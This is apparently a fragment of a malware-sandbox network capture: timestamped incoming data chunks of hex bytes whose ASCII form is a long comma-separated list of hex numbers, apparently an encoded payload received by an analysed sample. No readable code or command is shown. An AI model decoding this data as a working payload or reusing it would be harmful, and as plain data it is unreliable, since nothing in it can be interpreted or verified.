2023-03-24 06:58:02 UTC	1104	IN	Data Raw: 65 31 2c 35 37 2c 31 34 35 2c 38 34 2c 31 32 36 2c 63 31 2c 61 33 2c 31 36 34 2c 31 31 39 2c 31 32 36 2c 33 63 2c 31 35 64 2c 31 32 65 2c 37 38 2c 65 31 2c 39 62 2c 31 31 38 2c 63 33 2c 31 33 33 2c 39 35 2c 31 32 64 2c 63 33 2c 66 33 2c 31 31 32 2c 35 64 2c 31 33 33 2c 34 30 2c 31 31 39 2c 31 30 30 2c 63 34 2c 31 35 35 2c 62 31 2c 62 37 2c 64 61 2c 31 36 65 2c 31 30 34 2c 62 38 2c 31 30 33 2c 37 36 2c 66 37 2c 31 30 65 2c 31 30 66 2c 65 34 2c 62 38 2c 35 39 2c 63 31 2c 38 65 2c 61 63 2c 65 31 2c 31 33 65 2c 64 33 2c 62 64 2c 35 37 2c 31 31 66 2c 31 30 36 2c 31 34 64 2c 31 35 31 2c 31 30 36 2c 34 38 2c 66 36 2c 31 31 61 2c 62 34 2c 66 36 2c 66 39 2c 39 63 2c 37 63 2c 39 64 2c 38 31 2c 65 64 2c 31 32 65 2c 39 31 2c 39 33 2c 62 35 2c 36 62 2c 37 36 2c 61 62 Data Ascii: e1,57,145,84,126,c1,a3,164,119,126,3c,15d,12e,78,e1,9b,118,c3,133,95,12d,c3,f3,112,5d,133,40,119,100,c4,155,b1,b7,da,16e,104,b8,103,76,f7,10e,10f,e4,b8,59,c1,8e,ac,e1,13e,d3,bd,57,11f,106,14d,151,106,48,f6,11a,b4,f6,f9,9c,7c,9d,81,ed,12e,91,93,b5,6b,76,ab
2023-03-24 06:58:02 UTC	1120	IN	Data Raw: 32 35 2c 31 33 31 2c 65 30 2c 38 35 2c 61 33 2c 66 62 2c 65 38 2c 61 36 2c 36 39 2c 31 35 62 2c 31 35 36 2c 38 37 2c 61 34 2c 63 64 2c 65 35 2c 64 64 2c 37 65 2c 35 38 2c 38 37 2c 63 65 2c 34 39 2c 66 36 2c 31 34 34 2c 31 32 33 2c 62 37 2c 38 63 2c 64 33 2c 66 35 2c 31 36 36 2c 36 32 2c 31 31 35 2c 35 65 2c 31 35 30 2c 31 30 37 2c 61 64 2c 35 38 2c 66 38 2c 33 34 2c 31 33 65 2c 34 31 2c 39 66 2c 39 36 2c 66 35 2c 31 31 61 2c 38 62 2c 66 66 2c 38 37 2c 31 31 34 2c 62 65 2c 31 31 38 2c 64 66 2c 31 30 35 2c 63 61 2c 63 66 2c 31 30 62 2c 36 34 2c 65 64 2c 31 30 30 2c 31 30 34 2c 39 66 2c 31 34 64 2c 35 30 2c 39 33 2c 63 30 2c 31 35 61 2c 38 63 2c 62 65 2c 64 65 2c 37 65 2c 66 30 2c 39 61 2c 31 30 62 2c 38 30 2c 39 32 2c 64 32 2c 31 36 30 2c 39 64 2c 31 32 63 Data Ascii: 25,131,e0,85,a3,fb,e8,a6,69,15b,156,87,a4,cd,e5,dd,7e,58,87,ce,49,f6,144,123,b7,8c,d3,f5,166,62,115,5e,150,107,ad,58,f8,34,13e,41,9f,96,f5,11a,8b,ff,87,114,be,118,df,105,ca,cf,10b,64,ed,100,104,9f,14d,50,93,c0,15a,8c,be,de,7e,f0,9a,10b,80,92,d2,160,9d,12c
2023-03-24 06:58:02 UTC	1136	IN	Data Raw: 39 2c 37 37 2c 61 38 2c 38 65 2c 61 62 2c 31 33 31 2c 35 39 2c 36 33 2c 66 36 2c 31 34 61 2c 66 35 2c 31 30 35 2c 31 35 32 2c 31 31 35 2c 31 31 64 2c 38 38 2c 34 66 2c 35 66 2c 62 30 2c 66 32 2c 31 33 36 2c 35 36 2c 66 39 2c 31 33 39 2c 35 61 2c 31 30 32 2c 38 64 2c 31 34 62 2c 63 62 2c 31 33 66 2c 34 31 2c 61 33 2c 66 66 2c 34 38 2c 35 62 2c 65 61 2c 31 30 63 2c 31 34 66 2c 66 62 2c 36 35 2c 65 34 2c 31 35 33 2c 31 33 32 2c 38 33 2c 65 33 2c 62 61 2c 66 32 2c 31 33 62 2c 39 62 2c 39 36 2c 31 34 37 2c 37 31 2c 31 34 66 2c 64 38 2c 62 35 2c 62 36 2c 31 31 63 2c 39 65 2c 64 31 2c 31 32 64 2c 31 31 66 2c 31 31 36 2c 33 65 2c 37 32 2c 61 34 2c 31 30 62 2c 31 32 64 2c 38 65 2c 62 31 2c 61 35 2c 38 33 2c 31 33 64 2c 31 33 65 2c 63 34 2c 66 63 2c 35 65 2c 31 32 Data Ascii: 9,77,a8,8e,ab,131,59,63,f6,14a,f5,105,152,115,11d,88,4f,5f,b0,f2,136,56,f9,139,5a,102,8d,14b,cb,13f,41,a3,ff,48,5b,ea,10c,14f,fb,65,e4,153,132,83,e3,ba,f2,13b,9b,96,147,71,14f,d8,b5,b6,11c,9e,d1,12d,11f,116,3e,72,a4,10b,12d,8e,b1,a5,83,13d,13e,c4,fc,5e,12
2023-03-24 06:58:02 UTC	1152	IN	Data Raw: 2c 36 34 2c 36 37 2c 63 64 2c 64 36 2c 66 33 2c 62 30 2c 63 65 2c 31 33 32 2c 65 63 2c 38 38 2c 37 33 2c 65 34 2c 38 36 2c 31 35 35 2c 31 34 32 2c 65 36 2c 33 30 2c 31 33 65 2c 39 37 2c 31 30 63 2c 31 30 34 2c 37 37 2c 38 32 2c 31 30 30 2c 38 66 2c 31 34 63 2c 61 65 2c 31 30 37 2c 64 37 2c 64 31 2c 36 65 2c 37 65 2c 36 63 2c 31 34 65 2c 31 33 66 2c 31 35 31 2c 31 32 31 2c 31 31 34 2c 31 36 33 2c 37 38 2c 61 32 2c 31 31 64 2c 31 32 37 2c 37 64 2c 62 65 2c 63 36 2c 62 39 2c 61 34 2c 65 38 2c 31 30 32 2c 31 32 66 2c 36 61 2c 64 62 2c 64 65 2c 31 31 37 2c 64 32 2c 39 32 2c 36 30 2c 63 35 2c 31 30 36 2c 65 34 2c 31 32 31 2c 66 32 2c 61 39 2c 31 31 63 2c 62 32 2c 34 66 2c 65 34 2c 31 31 33 2c 61 32 2c 31 31 36 2c 39 33 2c 31 35 33 2c 61 31 2c 31 30 66 2c 37 38 Data Ascii: ,64,67,cd,d6,f3,b0,ce,132,ec,88,73,e4,86,155,142,e6,30,13e,97,10c,104,77,82,100,8f,14c,ae,107,d7,d1,6e,7e,6c,14e,13f,151,121,114,163,78,a2,11d,127,7d,be,c6,b9,a4,e8,102,12f,6a,db,de,117,d2,92,60,c5,106,e4,121,f2,a9,11c,b2,4f,e4,113,a2,116,93,153,a1,10f,78
2023-03-24 06:58:02 UTC	1168	IN	Data Raw: 31 31 65 2c 31 31 35 2c 61 63 2c 66 33 2c 31 33 36 2c 31 33 35 2c 31 34 65 2c 31 30 61 2c 37 38 2c 31 33 34 2c 37 61 2c 31 31 38 2c 39 38 2c 62 66 2c 62 36 2c 62 35 2c 38 31 2c 62 36 2c 65 39 2c 38 62 2c 61 65 2c 65 62 2c 66 36 2c 65 62 2c 63 62 2c 61 63 2c 35 35 2c 39 65 2c 35 38 2c 65 31 2c 37 32 2c 37 30 2c 62 62 2c 62 61 2c 62 36 2c 31 30 36 2c 37 65 2c 63 64 2c 31 30 38 2c 31 33 61 2c 35 65 2c 38 66 2c 64 37 2c 65 62 2c 31 31 34 2c 38 38 2c 37 61 2c 31 32 66 2c 39 30 2c 61 33 2c 31 31 39 2c 39 38 2c 63 31 2c 35 37 2c 31 30 65 2c 31 32 36 2c 38 65 2c 65 36 2c 33 35 2c 31 34 35 2c 63 63 2c 65 36 2c 64 61 2c 31 34 65 2c 31 31 39 2c 38 33 2c 31 33 31 2c 31 33 38 2c 62 30 2c 31 37 35 2c 63 66 2c 31 35 32 2c 35 39 2c 63 64 2c 38 64 2c 31 30 39 2c 66 62 2c Data Ascii: 11e,115,ac,f3,136,135,14e,10a,78,134,7a,118,98,bf,b6,b5,81,b6,e9,8b,ae,eb,f6,eb,cb,ac,55,9e,58,e1,72,70,bb,ba,b6,106,7e,cd,108,13a,5e,8f,d7,eb,114,88,7a,12f,90,a3,119,98,c1,57,10e,126,8e,e6,35,145,cc,e6,da,14e,119,83,131,138,b0,175,cf,152,59,cd,8d,109,fb,
2023-03-24 06:58:02 UTC	1184	IN	Data Raw: 2c 39 65 2c 35 35 2c 36 37 2c 31 33 35 2c 36 38 2c 38 62 2c 36 30 2c 31 35 65 2c 31 31 61 2c 31 30 36 2c 37 35 2c 35 39 2c 38 37 2c 39 37 2c 66 63 2c 66 33 2c 31 30 34 2c 39 33 2c 31 30 33 2c 61 65 2c 63 31 2c 36 65 2c 62 65 2c 37 31 2c 31 35 37 2c 34 31 2c 64 63 2c 38 38 2c 31 30 63 2c 61 62 2c 65 36 2c 65 34 2c 31 33 38 2c 31 33 62 2c 35 37 2c 64 36 2c 36 33 2c 35 39 2c 38 38 2c 39 66 2c 64 34 2c 65 63 2c 36 66 2c 31 32 30 2c 31 32 65 2c 39 30 2c 31 37 35 2c 31 33 31 2c 37 39 2c 31 34 36 2c 64 64 2c 31 30 33 2c 61 38 2c 37 32 2c 62 64 2c 39 62 2c 38 36 2c 63 30 2c 31 36 66 2c 39 39 2c 31 31 37 2c 36 31 2c 31 31 39 2c 39 62 2c 65 31 2c 31 33 31 2c 39 34 2c 31 31 65 2c 31 32 35 2c 39 61 2c 63 64 2c 31 35 66 2c 37 37 2c 31 32 61 2c 37 64 2c 31 32 31 2c 65 Data Ascii: ,9e,55,67,135,68,8b,60,15e,11a,106,75,59,87,97,fc,f3,104,93,103,ae,c1,6e,be,71,157,41,dc,88,10c,ab,e6,e4,138,13b,57,d6,63,59,88,9f,d4,ec,6f,120,12e,90,175,131,79,146,dd,103,a8,72,bd,9b,86,c0,16f,99,117,61,119,9b,e1,131,94,11e,125,9a,cd,15f,77,12a,7d,121,e
2023-03-24 06:58:02 UTC	1200	IN	Data Raw: 31 2c 39 36 2c 38 31 2c 66 35 2c 64 64 2c 65 37 2c 31 31 30 2c 38 39 2c 34 62 2c 64 34 2c 31 30 63 2c 39 36 2c 64 62 2c 63 34 2c 36 37 2c 65 32 2c 35 38 2c 31 35 33 2c 31 31 30 2c 33 63 2c 61 38 2c 31 30 36 2c 63 33 2c 31 33 66 2c 31 32 32 2c 31 32 64 2c 31 36 39 2c 33 62 2c 61 64 2c 66 64 2c 39 62 2c 39 61 2c 38 33 2c 31 31 35 2c 62 64 2c 66 61 2c 31 30 32 2c 38 30 2c 39 31 2c 31 33 37 2c 63 64 2c 31 30 36 2c 36 36 2c 35 66 2c 31 34 65 2c 31 35 31 2c 65 61 2c 31 30 38 2c 33 36 2c 39 64 2c 38 39 2c 39 37 2c 31 32 31 2c 62 31 2c 31 35 65 2c 64 39 2c 36 35 2c 35 66 2c 63 30 2c 39 62 2c 62 63 2c 35 66 2c 39 34 2c 37 66 2c 31 30 64 2c 39 33 2c 61 66 2c 31 33 63 2c 31 33 37 2c 39 64 2c 31 31 35 2c 31 31 32 2c 61 34 2c 31 32 39 2c 38 31 2c 66 65 2c 35 61 2c 31 Data Ascii: 1,96,81,f5,dd,e7,110,89,4b,d4,10c,96,db,c4,67,e2,58,153,110,3c,a8,106,c3,13f,122,12d,169,3b,ad,fd,9b,9a,83,115,bd,fa,102,80,91,137,cd,106,66,5f,14e,151,ea,108,36,9d,89,97,121,b1,15e,d9,65,5f,c0,9b,bc,5f,94,7f,10d,93,af,13c,137,9d,115,112,a4,129,81,fe,5a,1
2023-03-24 06:58:02 UTC	1216	IN	Data Raw: 2c 35 38 2c 31 30 34 2c 31 33 64 2c 39 66 2c 35 37 2c 38 37 2c 63 31 2c 31 30 34 2c 33 64 2c 39 39 2c 31 33 66 2c 65 32 2c 31 34 38 2c 61 36 2c 31 30 64 2c 66 30 2c 63 33 2c 31 32 61 2c 37 39 2c 38 66 2c 31 31 66 2c 31 35 30 2c 31 35 65 2c 64 64 2c 37 62 2c 63 38 2c 31 30 33 2c 62 37 2c 37 39 2c 37 66 2c 37 39 2c 35 65 2c 31 33 36 2c 38 64 2c 63 33 2c 39 66 2c 62 36 2c 61 64 2c 31 33 37 2c 31 35 66 2c 35 63 2c 39 32 2c 31 30 36 2c 66 31 2c 66 65 2c 39 61 2c 37 33 2c 31 33 34 2c 35 36 2c 34 65 2c 64 64 2c 35 31 2c 37 30 2c 61 33 2c 31 35 66 2c 62 33 2c 61 66 2c 65 63 2c 61 35 2c 31 35 34 2c 66 63 2c 63 62 2c 36 64 2c 63 62 2c 62 61 2c 64 34 2c 31 33 38 2c 31 32 64 2c 65 38 2c 31 33 33 2c 31 35 36 2c 31 36 38 2c 36 63 2c 31 31 62 2c 31 34 61 2c 31 30 64 2c Data Ascii: ,58,104,13d,9f,57,87,c1,104,3d,99,13f,e2,148,a6,10d,f0,c3,12a,79,8f,11f,150,15e,dd,7b,c8,103,b7,79,7f,79,5e,136,8d,c3,9f,b6,ad,137,15f,5c,92,106,f1,fe,9a,73,134,56,4e,dd,51,70,a3,15f,b3,af,ec,a5,154,fc,cb,6d,cb,ba,d4,138,12d,e8,133,156,168,6c,11b,14a,10d,
2023-03-24 06:58:02 UTC	1232	IN	Data Raw: 31 2c 38 36 2c 38 32 2c 61 63 2c 37 61 2c 31 32 62 2c 31 32 34 2c 66 37 2c 64 62 2c 38 32 2c 31 31 37 2c 31 32 38 2c 31 35 66 2c 65 38 2c 36 36 2c 62 39 2c 31 37 33 2c 31 34 31 2c 65 34 2c 63 66 2c 36 33 2c 31 32 36 2c 63 33 2c 66 65 2c 39 66 2c 31 37 37 2c 31 35 64 2c 65 33 2c 39 63 2c 66 34 2c 37 63 2c 64 39 2c 38 65 2c 66 62 2c 61 32 2c 64 62 2c 38 34 2c 61 38 2c 31 32 63 2c 31 30 35 2c 61 63 2c 63 35 2c 39 36 2c 36 37 2c 63 63 2c 66 37 2c 39 64 2c 65 31 2c 31 31 32 2c 65 63 2c 31 30 36 2c 31 34 32 2c 39 39 2c 31 32 37 2c 61 61 2c 64 38 2c 31 32 36 2c 65 38 2c 62 38 2c 31 34 64 2c 38 62 2c 37 64 2c 31 35 32 2c 61 30 2c 31 33 66 2c 36 35 2c 31 34 37 2c 63 39 2c 34 38 2c 35 33 2c 66 35 2c 38 65 2c 64 34 2c 37 37 2c 37 61 2c 64 32 2c 62 32 2c 31 33 37 2c Data Ascii: 1,86,82,ac,7a,12b,124,f7,db,82,117,128,15f,e8,66,b9,173,141,e4,cf,63,126,c3,fe,9f,177,15d,e3,9c,f4,7c,d9,8e,fb,a2,db,84,a8,12c,105,ac,c5,96,67,cc,f7,9d,e1,112,ec,106,142,99,127,aa,d8,126,e8,b8,14d,8b,7d,152,a0,13f,65,147,c9,48,53,f5,8e,d4,77,7a,d2,b2,137,
2023-03-24 06:58:02 UTC	1248	IN	Data Raw: 32 2c 65 35 2c 66 30 2c 66 65 2c 36 32 2c 63 61 2c 35 63 2c 39 33 2c 31 31 39 2c 31 32 62 2c 31 30 39 2c 64 39 2c 31 34 62 2c 39 33 2c 35 61 2c 31 31 31 2c 31 36 34 2c 38 32 2c 66 35 2c 64 32 2c 31 34 64 2c 62 63 2c 31 33 65 2c 63 35 2c 39 33 2c 62 31 2c 31 34 33 2c 36 35 2c 63 39 2c 31 31 33 2c 39 34 2c 65 33 2c 65 34 2c 38 35 2c 31 36 66 2c 62 61 2c 66 33 2c 31 31 63 2c 34 64 2c 61 35 2c 62 31 2c 36 63 2c 39 65 2c 31 31 30 2c 61 65 2c 65 65 2c 31 32 61 2c 62 32 2c 65 63 2c 65 66 2c 66 37 2c 31 30 38 2c 31 32 61 2c 39 36 2c 65 34 2c 36 31 2c 63 62 2c 35 62 2c 62 31 2c 35 63 2c 63 30 2c 62 63 2c 37 34 2c 64 35 2c 64 65 2c 64 66 2c 61 63 2c 31 32 37 2c 31 34 37 2c 64 64 2c 36 32 2c 34 31 2c 31 34 66 2c 35 36 2c 64 63 2c 62 33 2c 31 33 35 2c 65 39 2c 62 39 Data Ascii: 2,e5,f0,fe,62,ca,5c,93,119,12b,109,d9,14b,93,5a,111,164,82,f5,d2,14d,bc,13e,c5,93,b1,143,65,c9,113,94,e3,e4,85,16f,ba,f3,11c,4d,a5,b1,6c,9e,110,ae,ee,12a,b2,ec,ef,f7,108,12a,96,e4,61,cb,5b,b1,5c,c0,bc,74,d5,de,df,ac,127,147,dd,62,41,14f,56,dc,b3,135,e9,b9
2023-03-24 06:58:02 UTC	1264	IN	Data Raw: 64 32 2c 64 32 2c 63 35 2c 64 30 2c 31 36 31 2c 31 32 64 2c 31 30 30 2c 61 30 2c 63 62 2c 64 32 2c 31 32 65 2c 62 62 2c 62 34 2c 63 34 2c 39 31 2c 31 36 31 2c 65 34 2c 38 63 2c 64 30 2c 31 31 39 2c 36 30 2c 31 34 32 2c 31 35 39 2c 63 62 2c 62 32 2c 39 30 2c 63 34 2c 36 31 2c 35 38 2c 61 32 2c 31 32 39 2c 66 38 2c 37 38 2c 64 31 2c 31 32 66 2c 31 34 37 2c 66 34 2c 31 37 30 2c 62 39 2c 62 36 2c 31 32 61 2c 36 64 2c 37 37 2c 62 63 2c 31 34 34 2c 39 34 2c 31 34 34 2c 66 65 2c 63 63 2c 31 30 30 2c 36 38 2c 66 33 2c 63 38 2c 31 32 61 2c 31 30 35 2c 39 38 2c 31 32 36 2c 33 33 2c 64 65 2c 37 30 2c 37 31 2c 36 31 2c 38 30 2c 63 33 2c 62 37 2c 61 31 2c 61 35 2c 65 37 2c 66 31 2c 31 32 33 2c 31 31 31 2c 65 30 2c 37 39 2c 31 32 37 2c 31 33 64 2c 64 34 2c 31 34 30 2c Data Ascii: d2,d2,c5,d0,161,12d,100,a0,cb,d2,12e,bb,b4,c4,91,161,e4,8c,d0,119,60,142,159,cb,b2,90,c4,61,58,a2,129,f8,78,d1,12f,147,f4,170,b9,b6,12a,6d,77,bc,144,94,144,fe,cc,100,68,f3,c8,12a,105,98,126,33,de,70,71,61,80,c3,b7,a1,a5,e7,f1,123,111,e0,79,127,13d,d4,140,
2023-03-24 06:58:02 UTC	1280	IN	Data Raw: 35 2c 64 30 2c 64 36 2c 65 30 2c 62 35 2c 31 33 32 2c 66 30 2c 33 38 2c 31 34 35 2c 38 36 2c 31 32 64 2c 38 30 2c 66 34 2c 63 37 2c 38 31 2c 31 32 33 2c 31 32 35 2c 63 34 2c 66 65 2c 31 33 35 2c 61 31 2c 64 35 2c 31 34 36 2c 38 66 2c 64 30 2c 37 62 2c 64 65 2c 31 34 37 2c 39 62 2c 39 37 2c 36 33 2c 31 36 39 2c 31 32 30 2c 38 37 2c 31 33 64 2c 38 33 2c 64 39 2c 37 35 2c 62 37 2c 33 66 2c 31 35 30 2c 61 34 2c 31 33 34 2c 64 30 2c 31 34 62 2c 31 32 64 2c 37 63 2c 38 64 2c 31 33 65 2c 64 63 2c 31 30 63 2c 31 31 37 2c 61 36 2c 64 39 2c 61 35 2c 65 35 2c 65 37 2c 37 34 2c 65 63 2c 31 31 35 2c 31 30 64 2c 37 30 2c 39 66 2c 38 30 2c 37 38 2c 38 61 2c 38 61 2c 31 33 64 2c 39 39 2c 62 66 2c 31 32 37 2c 33 33 2c 37 36 2c 34 39 2c 39 61 2c 31 34 61 2c 31 34 37 2c 31 Data Ascii: 5,d0,d6,e0,b5,132,f0,38,145,86,12d,80,f4,c7,81,123,125,c4,fe,135,a1,d5,146,8f,d0,7b,de,147,9b,97,63,169,120,87,13d,83,d9,75,b7,3f,150,a4,134,d0,14b,12d,7c,8d,13e,dc,10c,117,a6,d9,a5,e5,e7,74,ec,115,10d,70,9f,80,78,8a,8a,13d,99,bf,127,33,76,49,9a,14a,147,1
2023-03-24 06:58:02 UTC	1296	IN	Data Raw: 31 30 61 2c 65 63 2c 61 62 2c 31 35 35 2c 31 35 35 2c 35 30 2c 31 32 66 2c 38 31 2c 31 34 35 2c 66 62 2c 36 30 2c 39 31 2c 38 32 2c 37 33 2c 35 33 2c 66 39 2c 31 30 38 2c 31 32 34 2c 39 37 2c 66 39 2c 66 37 2c 38 39 2c 66 35 2c 38 32 2c 31 31 34 2c 31 33 37 2c 38 32 2c 37 31 2c 31 30 66 2c 34 61 2c 37 35 2c 31 36 61 2c 31 36 31 2c 31 31 62 2c 34 35 2c 31 35 30 2c 65 33 2c 31 32 35 2c 39 39 2c 65 35 2c 38 66 2c 64 39 2c 31 31 65 2c 36 66 2c 63 36 2c 31 31 62 2c 62 31 2c 65 31 2c 38 66 2c 62 63 2c 31 33 61 2c 65 37 2c 35 39 2c 36 30 2c 31 30 64 2c 37 39 2c 62 33 2c 66 34 2c 66 63 2c 36 65 2c 37 62 2c 61 37 2c 38 33 2c 64 35 2c 65 31 2c 66 36 2c 31 32 61 2c 61 65 2c 37 30 2c 38 62 2c 66 39 2c 31 33 38 2c 31 31 33 2c 31 30 34 2c 64 37 2c 38 33 2c 31 33 30 2c Data Ascii: 10a,ec,ab,155,155,50,12f,81,145,fb,60,91,82,73,53,f9,108,124,97,f9,f7,89,f5,82,114,137,82,71,10f,4a,75,16a,161,11b,45,150,e3,125,99,e5,8f,d9,11e,6f,c6,11b,b1,e1,8f,bc,13a,e7,59,60,10d,79,b3,f4,fc,6e,7b,a7,83,d5,e1,f6,12a,ae,70,8b,f9,138,113,104,d7,83,130,
2023-03-24 06:58:02 UTC	1312	IN	Data Raw: 2c 38 66 2c 31 30 31 2c 61 62 2c 39 32 2c 62 66 2c 39 39 2c 64 36 2c 31 31 30 2c 31 30 62 2c 36 36 2c 31 33 38 2c 33 64 2c 31 33 35 2c 64 66 2c 35 36 2c 31 32 66 2c 31 30 65 2c 65 62 2c 62 63 2c 31 31 64 2c 31 31 63 2c 39 39 2c 31 31 30 2c 35 63 2c 38 62 2c 36 64 2c 31 35 34 2c 63 34 2c 35 37 2c 64 62 2c 31 35 33 2c 31 34 65 2c 64 35 2c 35 38 2c 62 61 2c 31 30 61 2c 34 63 2c 66 65 2c 39 32 2c 37 63 2c 31 35 33 2c 61 39 2c 31 32 37 2c 31 30 32 2c 61 32 2c 31 32 34 2c 62 37 2c 31 34 36 2c 63 66 2c 31 33 64 2c 31 32 38 2c 31 33 62 2c 38 33 2c 31 33 61 2c 61 61 2c 31 30 30 2c 39 30 2c 61 61 2c 31 34 62 2c 61 34 2c 63 39 2c 31 33 64 2c 36 37 2c 63 32 2c 65 37 2c 63 36 2c 63 62 2c 38 39 2c 31 32 35 2c 31 30 31 2c 31 32 30 2c 31 31 62 2c 38 32 2c 63 61 2c 62 38 Data Ascii: ,8f,101,ab,92,bf,99,d6,110,10b,66,138,3d,135,df,56,12f,10e,eb,bc,11d,11c,99,110,5c,8b,6d,154,c4,57,db,153,14e,d5,58,ba,10a,4c,fe,92,7c,153,a9,127,102,a2,124,b7,146,cf,13d,128,13b,83,13a,aa,100,90,aa,14b,a4,c9,13d,67,c2,e7,c6,cb,89,125,101,120,11b,82,ca,b8
2023-03-24 06:58:02 UTC	1328	IN	Data Raw: 36 66 2c 31 32 36 2c 39 37 2c 65 39 2c 62 63 2c 31 32 38 2c 31 33 35 2c 62 66 2c 37 61 2c 64 32 2c 65 65 2c 31 34 62 2c 62 64 2c 31 31 37 2c 36 38 2c 39 30 2c 31 31 31 2c 35 33 2c 36 34 2c 31 31 35 2c 61 65 2c 31 34 32 2c 66 66 2c 61 64 2c 66 64 2c 31 37 32 2c 66 37 2c 31 30 31 2c 37 37 2c 61 65 2c 31 32 64 2c 31 31 66 2c 31 31 66 2c 31 32 32 2c 31 34 34 2c 31 32 36 2c 65 65 2c 31 32 34 2c 66 31 2c 63 38 2c 37 64 2c 64 34 2c 65 33 2c 64 37 2c 62 32 2c 62 30 2c 35 65 2c 36 33 2c 37 61 2c 39 33 2c 31 32 39 2c 31 31 38 2c 62 62 2c 61 31 2c 39 34 2c 61 63 2c 31 30 64 2c 38 38 2c 31 34 62 2c 31 32 31 2c 31 30 36 2c 31 33 35 2c 31 34 65 2c 35 63 2c 64 37 2c 64 65 2c 31 30 64 2c 64 35 2c 62 65 2c 35 66 2c 31 33 38 2c 39 38 2c 36 65 2c 37 35 2c 36 64 2c 65 36 2c Data Ascii: 6f,126,97,e9,bc,128,135,bf,7a,d2,ee,14b,bd,117,68,90,111,53,64,115,ae,142,ff,ad,fd,172,f7,101,77,ae,12d,11f,11f,122,144,126,ee,124,f1,c8,7d,d4,e3,d7,b2,b0,5e,63,7a,93,129,118,bb,a1,94,ac,10d,88,14b,121,106,135,14e,5c,d7,de,10d,d5,be,5f,138,98,6e,75,6d,e6,
2023-03-24 06:58:02 UTC	1344	IN	Data Raw: 2c 64 36 2c 65 32 2c 31 31 62 2c 31 32 61 2c 35 66 2c 65 31 2c 37 34 2c 38 65 2c 64 33 2c 65 37 2c 39 31 2c 61 36 2c 65 63 2c 61 31 2c 35 36 2c 31 34 65 2c 65 66 2c 31 35 33 2c 37 63 2c 31 32 66 2c 61 61 2c 65 66 2c 64 39 2c 36 31 2c 31 30 38 2c 37 39 2c 63 31 2c 36 65 2c 38 31 2c 36 35 2c 31 31 31 2c 31 34 34 2c 31 33 61 2c 36 64 2c 35 34 2c 38 64 2c 31 32 33 2c 37 64 2c 31 34 35 2c 61 62 2c 31 34 38 2c 31 34 64 2c 39 64 2c 31 35 34 2c 31 34 32 2c 36 65 2c 31 32 38 2c 35 62 2c 31 32 65 2c 36 62 2c 37 30 2c 66 34 2c 31 31 63 2c 66 37 2c 62 64 2c 61 34 2c 65 39 2c 31 35 39 2c 62 34 2c 31 32 63 2c 61 30 2c 37 66 2c 39 39 2c 31 34 66 2c 31 30 34 2c 36 63 2c 31 31 61 2c 66 36 2c 31 33 65 2c 39 36 2c 61 39 2c 31 30 64 2c 31 30 64 2c 38 66 2c 64 66 2c 31 34 64 Data Ascii: ,d6,e2,11b,12a,5f,e1,74,8e,d3,e7,91,a6,ec,a1,56,14e,ef,153,7c,12f,aa,ef,d9,61,108,79,c1,6e,81,65,111,144,13a,6d,54,8d,123,7d,145,ab,148,14d,9d,154,142,6e,128,5b,12e,6b,70,f4,11c,f7,bd,a4,e9,159,b4,12c,a0,7f,99,14f,104,6c,11a,f6,13e,96,a9,10d,10d,8f,df,14d
2023-03-24 06:58:02 UTC	1360	IN	Data Raw: 2c 31 34 35 2c 39 37 2c 39 34 2c 33 34 2c 31 34 35 2c 31 32 32 2c 31 34 64 2c 31 30 32 2c 65 62 2c 31 35 35 2c 61 30 2c 31 33 35 2c 37 62 2c 66 32 2c 31 32 64 2c 65 66 2c 63 32 2c 31 32 62 2c 61 65 2c 31 32 66 2c 37 65 2c 37 34 2c 34 63 2c 31 32 39 2c 39 64 2c 31 33 62 2c 37 38 2c 65 32 2c 39 65 2c 65 62 2c 63 31 2c 31 34 32 2c 35 62 2c 35 65 2c 35 35 2c 62 61 2c 35 65 2c 65 36 2c 39 66 2c 31 35 61 2c 31 34 33 2c 37 62 2c 35 36 2c 61 31 2c 66 62 2c 62 38 2c 37 63 2c 31 32 65 2c 61 37 2c 31 31 64 2c 31 31 38 2c 33 34 2c 31 32 62 2c 64 32 2c 31 33 36 2c 66 30 2c 64 34 2c 63 66 2c 31 32 38 2c 31 30 32 2c 64 36 2c 31 34 65 2c 61 35 2c 65 66 2c 31 32 33 2c 31 34 34 2c 31 33 63 2c 38 34 2c 61 32 2c 31 31 62 2c 66 37 2c 31 30 34 2c 31 35 39 2c 65 39 2c 36 36 2c Data Ascii: ,145,97,94,34,145,122,14d,102,eb,155,a0,135,7b,f2,12d,ef,c2,12b,ae,12f,7e,74,4c,129,9d,13b,78,e2,9e,eb,c1,142,5b,5e,55,ba,5e,e6,9f,15a,143,7b,56,a1,fb,b8,7c,12e,a7,11d,118,34,12b,d2,136,f0,d4,cf,128,102,d6,14e,a5,ef,123,144,13c,84,a2,11b,f7,104,159,e9,66,
2023-03-24 06:58:02 UTC	1376	IN	Data Raw: 32 2c 31 30 64 2c 35 65 2c 31 33 38 2c 31 31 64 2c 63 31 2c 37 66 2c 64 37 2c 31 35 34 2c 31 32 62 2c 39 65 2c 36 64 2c 63 36 2c 63 34 2c 61 30 2c 61 62 2c 64 64 2c 36 37 2c 65 30 2c 38 62 2c 31 34 63 2c 66 33 2c 39 30 2c 31 31 37 2c 33 32 2c 31 31 39 2c 65 31 2c 62 36 2c 61 66 2c 39 35 2c 36 31 2c 39 37 2c 31 32 32 2c 39 38 2c 65 37 2c 31 32 39 2c 37 39 2c 65 35 2c 31 30 61 2c 37 30 2c 35 39 2c 31 31 38 2c 31 30 65 2c 39 33 2c 39 64 2c 64 38 2c 39 64 2c 36 65 2c 63 37 2c 31 34 38 2c 31 33 39 2c 38 64 2c 37 35 2c 63 30 2c 37 62 2c 61 65 2c 38 36 2c 39 33 2c 65 61 2c 31 36 32 2c 39 64 2c 37 33 2c 39 63 2c 31 33 33 2c 37 61 2c 61 39 2c 66 64 2c 63 37 2c 38 34 2c 63 33 2c 31 30 38 2c 37 66 2c 39 35 2c 31 31 31 2c 31 35 39 2c 31 32 33 2c 31 30 37 2c 62 30 2c Data Ascii: 2,10d,5e,138,11d,c1,7f,d7,154,12b,9e,6d,c6,c4,a0,ab,dd,67,e0,8b,14c,f3,90,117,32,119,e1,b6,af,95,61,97,122,98,e7,129,79,e5,10a,70,59,118,10e,93,9d,d8,9d,6e,c7,148,139,8d,75,c0,7b,ae,86,93,ea,162,9d,73,9c,133,7a,a9,fd,c7,84,c3,108,7f,95,111,159,123,107,b0,
